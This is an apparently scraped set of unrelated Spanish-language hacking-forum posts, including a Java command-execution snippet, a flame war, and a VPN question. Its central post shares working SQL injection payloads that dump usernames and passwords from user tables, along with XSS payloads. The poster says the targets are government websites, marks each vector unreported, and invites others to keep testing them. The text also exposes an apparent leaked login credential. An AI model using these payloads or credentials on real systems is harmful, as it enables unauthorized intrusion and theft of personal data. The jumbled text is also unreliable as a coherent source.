mira podes hacer esto

String so = System.getProperty("os.name");
String cmd = txtinput.getText().tostring;

                        // Ejecutamos cmd
                        Process p = Runtime.getRuntime().exec(cmd);

                        BufferedReader bufRInput = new BufferedReader(new InputStreamReader(
                                        p.getInputStream()));

                        BufferedReader stdError = new BufferedReader(new InputStreamReader(
                                        p.getErrorStream()));

                        // Leemos la salida
                        while ((s = stdInput.readLine()) != null) {
                                System.out.println(s);
                        }

es mas podes dividirlo en 2 clases, o hacer un modelo vista controlador, tomar los comandos por un jdialog o jframe y mandarlos a la clase You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por medio de getter y setter y que esto devuelva el array y lo muestras en el textArea de tu Form, Espero haberte dado una idea!

Woow llegue tarde :/ era un proyecto que tenia en mente, bueno me quedara hacer una version para android buena tool!!!

Lo hago publico con la finalidad de darle una mano a la gente que quiere aprender y ver vectores reales y puedan probar o hacerse a la idea de distintas formas de hacer sqli, y el plus se lo doy ya que son webs del gobierno y llegado el momento que haga el tiempito, voy a empesar a reportar todo mientras tanto y mientras no se reparen los fallos pueden ir testeando, he publicado otras sqli con waf bypass, para justamente ayudar a otras personas a experimentar y ver otros vectores. Varios amigos han podido aplicar otros metodos como double error y otros metodos de filtrado de waf del los cuales tambien he aprendido cosas muy utiles al estudiar sus vectores, y asi tanto yo como la gente que quiera investigar un poco mas podemos hacer un reflujo de conocimiento, y pasarnos vectores personalizados y nuevos para ir aprendiendo.

Ademas le doy un poco mas de vida a la sección!

SQL:

Verctor:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login union select group_concat(concat_ws(char(58),username,password,realname) SEPARATOR 0x7e) from users-- -c

Reportado: No

gerardo.flores:gf43

SQLI
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login limit 1,1--%20-c
Reportado: No

XSS:
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<script>alert(/HD_Breaker/)</script><!--
Reportado: NO

SQLI

Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login' union select 1,concat_ws(char(58),usu_nombre,usu_clave,usu_tipo),3,4,5,6,7,8,9,10,11%20from _usuarios-- -c
Reportado: NO

Pasa lo que quieras bro, que quieres que el mundo se entere que me ayudaste a entender csrf? que me diste el codigo pedorro de un email bomber en php que utilice para armar uno mio porq no entendia como se utilizaba la funcion mail()? crees q tengo algo q esconder? mis logros son mios y mis esfuerzos son mios, yo te agradeci en el momento y q se entere todo underc0de, a mi no me hace mas verga ser un pendejo de 17 que se cree chuck norris, bien tu por tus conocimientos, pero no aportas nada mas q criticas

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Que grande bro! Tu no testeas web pequeñas, siempre a lo grande..
Saludos,, Cronos.-

Las webs "más visitadas" si buscas un poco, alucinarias.(Si vieras mi correo..)

En cambio hay algunas apenas vistas, que su seguridad es perfecta.

Con todo respeto, creo q tu solo vienes aquí a caretear de tus habilidades, estamos felicitando a pr0ph3t por su descubrimiento no a vos por los miles que haces, si no estas de acuerdo con esto porq comentas?

Sape!!! muy bueno! te felicito!

SQLI
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Reportado: No

Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login SEPARATOR 0x7e),3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+m_user+limit+1,1--+

Reportado: No

Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"><img+src%3D.+onerror%3Dprompt%28%2FHD_Breaker%2F%29><%21--
Estado: No Reportado

Definitivamente el mejor tuto que he visto de doble error! gracias!

Muy bueno bro! te felicito!

Aca se tratan temas sobre etical hacking, no de defacement... lo unico q te puedo decir es q no te limites a exploit y q hagas un pentest respetando todos los pasos, en especial la recopilacion de informacion, para poder trazar una estrategia bien armada, y no atacar a lo tonto

absolutamente nada, solo dice la conexion a la vpn ha fallado

he intentado esto y todo lo que encontrado y se me ha ocurrido y nada, sigo sin poder conectarme a mi vpn PPTP desde kali

Networking depende el contexto, puede ser desde un trabajo grupal asistido por redes hasta el nombre de un proceso que se encarga de gestionar las conexiones entre el pc y los AP en Linux